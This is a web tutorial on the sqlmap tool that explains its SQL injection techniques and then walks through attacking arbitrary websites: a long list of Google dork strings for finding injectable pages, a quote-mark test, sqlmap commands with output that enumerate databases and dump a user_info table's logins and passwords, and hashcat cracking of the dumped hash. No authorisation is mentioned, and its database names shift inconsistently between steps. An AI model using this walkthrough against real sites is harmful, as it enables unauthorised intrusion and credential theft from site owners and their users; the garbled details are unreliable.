SQLMAP-Detecting and Exploiting SQL Injection- A Detailed Explanation

Sqlmap is an open-source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over database servers.

It comes with a powerful detection engine, many niche features for the ultimate penetration tester, and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.

Future of the Tool:

• Full support for MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase, SAP MaxDB, HSQLDB, and Informix database management systems.
• Full support for six SQL injection techniques: boolean-based blind, time-based blind, error-based, UNION query-based, stacked queries, and out-of-band.
• Support to directly connect to the database without passing via a SQL injection, by providing DBMS credentials, IP address, port, and database name.
• Support to enumerate users, password hashes, privileges, roles, databases, tables, and columns.
• Automatic recognition of password hash formats and support for cracking them using a dictionary-based attack.
• Support to dump database tables entirely, a range of entries, or specific columns as per user’s choice. The user can also choose to dump only a range of characters from each column’s entry.
• Support to search for specific database names, specific tables across all databases, or specific columns across all databases’ tables. This is useful, for instance, to identify tables containing custom application credentials where relevant columns’ names contain strings like name and pass.
• Support to download and upload any file from the database server underlying file system when the database software is MySQL, PostgreSQL, or Microsoft SQL Server.
• Support to execute arbitrary commands and retrieve their standard output on the database server underlying the operating system when the database software is MySQL, PostgreSQL, or Microsoft SQL Server.
• Support to establish an out-of-band stateful TCP connection between the attacker machine and the database server underlying operating system. This channel can be an interactive command prompt, a Meterpreter session or a graphical user interface (VNC) session as per user’s choice.
• Support for database process’ user privilege escalation via Metasploit’s Meterpreter getsystemcommand.

Also Read    Lynis – Open source security auditing tool – A Detailed Explanation

Techniques:

sqlmap is able to detect and exploit five different SQL injection types:

Boolean-based blind:

• sqlmap replaces or appends to the affected parameter in the HTTP request, a syntactically valid SQL statement string containing a SELECT sub-statement, or any other SQL statement whose the user wants to retrieve the output.

• For each HTTP response, by making a comparison between the HTTP response headers/body with the original request, the tool inference the output of the injected statement character by character. Alternatively, the user can provide a string or regular expression to match on True pages.

• The bisection algorithm implemented in sqlmap to perform this technique is able to fetch each character of the output with a maximum of seven HTTP requests.

• Where the output is not within the clear-text plain charset, sqlmap will adapt the algorithm with bigger ranges to detect the output.

Time-based blind:

• sqlmap replaces or appends to the affected parameter in the HTTP request, a syntactically valid SQL statement string containing a query which put on hold the back-end DBMS to return for a certain number of seconds.

• For each HTTP response, by making a comparison between the HTTP response time with the original request, the tool inference the output of the injected statement character by character. As for the boolean-based technique, the bisection algorithm is applied.

Error-based:

• sqlmap replaces or appends to the affected parameter a database-specific error message provoking statement and parses the HTTP response headers and body in search of DBMS error messages containing the injected pre-defined chain of characters and the subquery statement output within.

• This technique works only when the web application has been configured to disclose back-end database management system error messages.

UNION query-based:

• sqlmap appends to the affected parameter a syntactically valid SQL statement starting with an UNION ALL SELECT. This technique works when the web application page passes directly the output of the statementSELECT within a for loop, or similar, so that each line of the query output is printed on the page content.

• sqlmap is also able to exploit partial (single entry) UNION query SQL injection vulnerabilities which occur when the output of the statement is not cycled in a for construct, whereas only the first entry of the query output is displayed.

Stacked queries:

• also known as piggy backing: sqlmap tests if the web application supports stacked queries and then, in case it does support, it appends to the affected parameter in the HTTP request, a semi-colon (;) followed by the SQL statement to be executed.
• This technique is useful to run SQL statements other than SELECT, like for instance, data definition or data manipulation statements, possibly leading to file system read and write access and operating system command execution depending on the underlying back-end database management system and the session user privileges.

Find a Vulnerable Website:

This is usually the toughest bit and takes longer than any other step. Those who know how to use Google Dorks know this already, but in case you don’t I have put together a number of strings that you can search in Google.

Just copy and paste any of the lines in Google and Google will show you a number of search results.

Google dork:

A Google dork is an employee who unknowingly exposes sensitive corporate information on the Internet. The word dork is slang for a slow-witted or inept person.

Google dorks put corporate information at risk because they unwittingly create back doors that allow an attacker to enter a network without permission and/or gain access to unauthorized information.

To locate sensitive information, attackers use advanced search strings called Google dork queries.

Google Dorks strings to find Vulnerable SQLMAP SQL injectable website:

Google Dork string Column 1	Google Dork string Column 2	Google Dork string Column 3
inurl:item_id=	inurl:review.php?id=	inurl:hosting_info.php?id=
inurl:newsid=	inurl:iniziativa.php?in=	inurl:gallery.php?id=
inurl:trainers.php?id=	inurl:curriculum.php?id=	inurl:rub.php?idr=
inurl:news-full.php?id=	inurl:labels.php?id=	inurl:view_faq.php?id=
inurl:news_display.php?getid=	inurl:story.php?id=	inurl:artikelinfo.php?id=
inurl:index2.php?option=	inurl:look.php?ID=	inurl:detail.php?ID=
inurl:readnews.php?id=	inurl:newsone.php?id=	inurl:index.php?=
inurl:top10.php?cat=	inurl:aboutbook.php?id=	inurl:profile_view.php?id=
inurl:newsone.php?id=	inurl:material.php?id=	inurl:category.php?id=
inurl:event.php?id=	inurl:opinions.php?id=	inurl:publications.php?id=
inurl:product-item.php?id=	inurl:announce.php?id=	inurl:fellows.php?id=
inurl:sql.php?id=	inurl:rub.php?idr=	inurl:downloads_info.php?id=
inurl:index.php?catid=	inurl:galeri_info.php?l=	inurl:prod_info.php?id=
inurl:news.php?catid=	inurl:tekst.php?idt=	inurl:shop.php?do=part&id=
inurl:index.php?id=	inurl:newscat.php?id=	inurl:productinfo.php?id=
inurl:news.php?id=	inurl:newsticker_info.php?idn=	inurl:collectionitem.php?id=
inurl:index.php?id=	inurl:rubrika.php?idr=	inurl:band_info.php?id=
inurl:trainers.php?id=	inurl:rubp.php?idr=	inurl:product.php?id=
inurl:buy.php?category=	inurl:offer.php?idf=	inurl:releases.php?id=
inurl:article.php?ID=	inurl:art.php?idm=	inurl:ray.php?id=
inurl:play_old.php?id=	inurl:title.php?id=	inurl:produit.php?id=
inurl:declaration_more.php?decl_id=	inurl:news_view.php?id=	inurl:pop.php?id=
inurl:pageid=	inurl:select_biblio.php?id=	inurl:shopping.php?id=
inurl:games.php?id=	inurl:humor.php?id=	inurl:productdetail.php?id=
inurl:page.php?file=	inurl:aboutbook.php?id=	inurl:post.php?id=
inurl:newsDetail.php?id=	inurl:ogl_inet.php?ogl_id=	inurl:viewshowdetail.php?id=
inurl:gallery.php?id=	inurl:fiche_spectacle.php?id=	inurl:clubpage.php?id=
inurl:article.php?id=	inurl:communique_detail.php?id=	inurl:memberInfo.php?id=
inurl:show.php?id=	inurl:sem.php3?id=	inurl:section.php?id=
inurl:staff_id=	inurl:kategorie.php4?id=	inurl:theme.php?id=
inurl:newsitem.php?num=	inurl:news.php?id=	inurl:page.php?id=
inurl:readnews.php?id=	inurl:index.php?id=	inurl:shredder-categories.php?id=
inurl:top10.php?cat=	inurl:faq2.php?id=	inurl:tradeCategory.php?id=
inurl:historialeer.php?num=	inurl:show_an.php?id=	inurl:product_ranges_view.php?ID=
inurl:reagir.php?num=	inurl:preview.php?id=	inurl:shop_category.php?id=
inurl:Stray-Questions-View.php?num=	inurl:loadpsb.php?id=	inurl:transcript.php?id=
inurl:forum_bds.php?num=	inurl:opinions.php?id=	inurl:channel_id=
inurl:game.php?id=	inurl:spr.php?id=	inurl:aboutbook.php?id=
inurl:view_product.php?id=	inurl:pages.php?id=	inurl:preview.php?id=
inurl:newsone.php?id=	inurl:announce.php?id=	inurl:loadpsb.php?id=
inurl:sw_comment.php?id=	inurl:clanek.php4?id=	inurl:pages.php?id=
inurl:news.php?id=	inurl:participant.php?id=	about.php?cartID=
inurl:avd_start.php?avd=	inurl:download.php?id=	accinfo.php?cartId=
inurl:event.php?id=	inurl:main.php?id=	add-to-cart.php?ID=
inurl:product-item.php?id=	inurl:review.php?id=	addToCart.php?idProduct=
inurl:sql.php?id=	inurl:chappies.php?id=	addtomylist.php?ProdId=
inurl:material.php?id=	inurl:read.php?id=
inurl:clanek.php4?id=	inurl:prod_detail.php?id=
inurl:announce.php?id=	inurl:viewphoto.php?id=
inurl:chappies.php?id=	inurl:article.php?id=
inurl:read.php?id=	inurl:person.php?id=
inurl:viewapp.php?id=	inurl:productinfo.php?id=
inurl:viewphoto.php?id=	inurl:showimg.php?id=
inurl:rub.php?idr=	inurl:view.php?id=
inurl:galeri_info.php?l=	inurl:website.php?id=

Step 1: Initial check to confirm if the website is vulnerable to SQLMAP SQL Injection

For every string shown above, you will get hundreds of search results. How do you know which is really vulnerable to SQLMAP SQL Injection?

There are multiple ways and I am sure people would argue which one is best but to me, the following is the simplest and most conclusive.

Let’s say you searched using this string inurl:item_id= and one of the Google search result shows a website like this:

http://www.gbhackers.com/products_showitem_clemco.php?item_id=28434

Just add a single quotation mark ‘ at the end of the URL. (Just to ensure, ” is a double quotation mark and ” ‘ ” is a single quotation mark).

So now your URL will become like this:

http://www.gbhackers.com/products_showitem_clemco.php?item_id=28434'

If the page returns an SQL error, the page is vulnerable to SQLMAP SQL Injection. If it loads or redirect you to a different page, move on to the next site in your Google search results page.

See example error below in the screenshot. I’ve obscured everything including URL and page design for obvious reasons.

Examples of SQLi Errors from Different Databases and Languages

Microsoft SQL Server

Server Error in ‘/’ Application. Unclosed quotation mark before the character string ‘attack;’.

Description: An unhanded exception occurred during the execution of the current web request. Please review the stack trace for more information about the error where it originated in the code.

Exception Details: System.Data.SqlClient.SqlException: Unclosed quotation mark before the character string ‘attack;’.

MySQL Errors

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /var/www/myawesomestore.com/buystuff.php on line 12

Error: You have an error in your SQL syntax: check the manual that corresponds to your MySQL server version for the right syntax to use near ‘’’ at line 12

Oracle Errors

java.sql.SQLException: ORA-00933: SQL command not properly ended at oracle.jdbc.dbaaccess.DBError.throwSqlException(DBError.java:180) at oracle.jdbc.ttc7.TTIoer.processError(TTIoer.java:208)

Error: SQLExceptionjava.sql.SQLException: ORA-01756: quoted string not properly terminated

PostgreSQL Errors

Query failed: ERROR: unterminated quoted string at or near “‘’’”

Step 2: List DBMS databases using SQLMAP SQL Injection:

As you can see from the screenshot above, I’ve found an SQLMAP SQL Injection vulnerable website. Now I need to list all the databases in that Vulnerable database. (this is also called enumerating the number of columns). As I am using SQLMAP, it will also tell me which one is vulnerable.

Run the following command on your vulnerable website.

sqlmap -u http://www.gbhackers.com/products_showitem_clemco.php?item_id=28434 --dbs

In here:
sqlmap   =     Name of sqlmap binary file
-u             =     Target URL (e.g. “http://www.gbhackers.com/products_showitem_gbhac.php?item_id=28434”)
–dbs       =     Enumerate DBMS databases

See screenshot below.

This commands reveals quite a few interesting info:

web application technology: Apache
back-end DBMS: MySQL 5.0
[10:55:53] [INFO] retrieved: information_schema
[10:55:56] [INFO] retrieved: gbhackers
[10:55:56] [INFO] fetched data logged to text files under
 '/usr/share/sqlmap/output/www.gbhackers.com'

So, we now have two databases that we can look into. information_schema is a standard database for almost every MYSQL database. So our interest would be in clemcoindustries database.

Step 3: List tables of target database using SQLMAP SQL Injection:

Now we need to know how many tables this clemcoindustries database got and what are their names. To find out that information, use the following command:

sqlmap -u http://www.gbhackers.com/cgi-bin/item.cgi?item_id=15 -D
clemcoindustries --tables

this database got 8 tables.

[10:56:20] [INFO] fetching tables for database: 'gbhackers'
[10:56:22] [INFO] heuristics detected web page charset 'ISO-8859-2'
[10:56:22] [INFO] the SQL query used returns 8 entries
[10:56:25] [INFO] retrieved: item
[10:56:27] [INFO] retrieved: link
[10:56:30] [INFO] retrieved: other
[10:56:32] [INFO] retrieved: picture
[10:56:34] [INFO] retrieved: picture_tag
[10:56:37] [INFO] retrieved: popular_picture
[10:56:39] [INFO] retrieved: popular_tag
[10:56:42] [INFO] retrieved: user_info

and of course, we want to check whats inside user_info table using SQLMAP SQL Injection as that table probably contains usernames and passwords.

Step 4: List columns on target table of selected database using SQLMAP SQL Injection:

Now we need to list all the columns on the target table user_info of clemcoindustries database using SQLMAP SQL Injection. SQLMAP SQL Injection makes it really easy, run the following command:

sqlmap -u http://www.gbhackers.com/cgi-bin/item.cgi?item_id=15 -D
 gbhackers-T user_i
nfo --columns

This returns 5 entries from the target table user_info of clemcoindustries database.

[10:57:16] [INFO] fetching columns for table 'user_info' in database 'gbhackers '
[10:57:18] [INFO] heuristics detected web page charset 'ISO-8859-2'
[10:57:18] [INFO] the SQL query used returns 5 entries
[10:57:20] [INFO] retrieved: user_id
[10:57:22] [INFO] retrieved: int(10) unsigned
[10:57:25] [INFO] retrieved: user_login
[10:57:27] [INFO] retrieved: varchar(45)
[10:57:32] [INFO] retrieved: user_password
[10:57:34] [INFO] retrieved: varchar(255)
[10:57:37] [INFO] retrieved: unique_id
[10:57:39] [INFO] retrieved: varchar(255)
[10:57:41] [INFO] retrieved: record_status
[10:57:43] [INFO] retrieved: tinyint(4)

This is exactly what we are looking for … target table user_login and user_password.

Step 5: List usernames from target columns of the target table of the selected database using SQLMAP SQL Injection:

SQLMAP SQL Injection makes it Easy! Just run the following command again:

sqlmap -u http://www.gbhackers.com/cgi-bin/item.cgi?item_id=15 -D
gbhackers-T user_info -C user_login --dump

Guess what, we now have the username from the database:

[10:58:39] [INFO] retrieved: userX
[10:58:40] [INFO] analyzing table dump for possible password hashes

We are almost there, we now only need the password for this user. Next shows just that.

Step 6: Extract password from target columns of target table of selected database using SQLMAP SQL Injection:

You’re probably getting used to on how to use the SQLMAP SQL Injection tool. Use the following command to extract the password for the user.

sqlmap -u http://www.gbhackers.com/cgi-bin/item.cgi?item_id=15 -D gbhackers-T
user_info -C user_password --dump

We have hashed password : 24iYBc17xK0e

[10:59:15] [INFO] the SQL query used returns 1 entries
[10:59:17] [INFO] retrieved: 24iYBc17xK0e.
[10:59:18] [INFO] analyzing table dump for possible password hashes
Database: sqldummywebsite
Table: user_info
[1 entry]
+---------------+
| user_password |
+---------------+
| 24iYBc17xK0e. |
+---------------+

But hang on, this password looks funny. This can’t be someone’s password. Someone who leaves their website vulnerable like that just can’t have a password like that.

That is exactly right. This is a hashed password. What that means, the password is encrypted and now we need to decrypt it.

I have covered how to decrypt passwords extensively on this Cracking MD5, phpBB, MySQL, and SHA1 passwords with Hashcat on Kali Linux post. If you’ve missed it, you’re missing out a lot.

I will cover it in short here but you should really learn how to use hashcat.

Step 7: Cracking password:

So the hashed password is 24iYBc17xK0e. How do you know what type of hash is that?

1. Identify Hash type:

Luckily, Kali Linux provides a nice tool and we can use that to identify which type of hash is this. In the command line type in the following command and on prompt paste the hash value:

hash-identifier

Excellent. So this is DES(Unix) hash.

2. Crack HASH using cudahashcat:

First of all, I need to know which code to use for DES hashes. So let’s check that

cudahashcat --help | grep DES

So it’s either 1500 or 3100. But it was an MYSQL Database, so it must be 1500.

I saved the hash value 24iYBc17xK0e. in the DES.hash file. Following is the command I am running:

cudahashcat -m 1500 -a 0 /root/sql/DES.hash /root/sql/rockyou.txt

Interesting find: Usual Hashcat was unable to determine the code for DES hash. (not in its help menu). However both cudaHashcat and oclHashcat found and cracked the key.

Anyhow, so here’s the cracked password: abc123  24iYBc17xK0e. :abc123

we now even have the password for this user.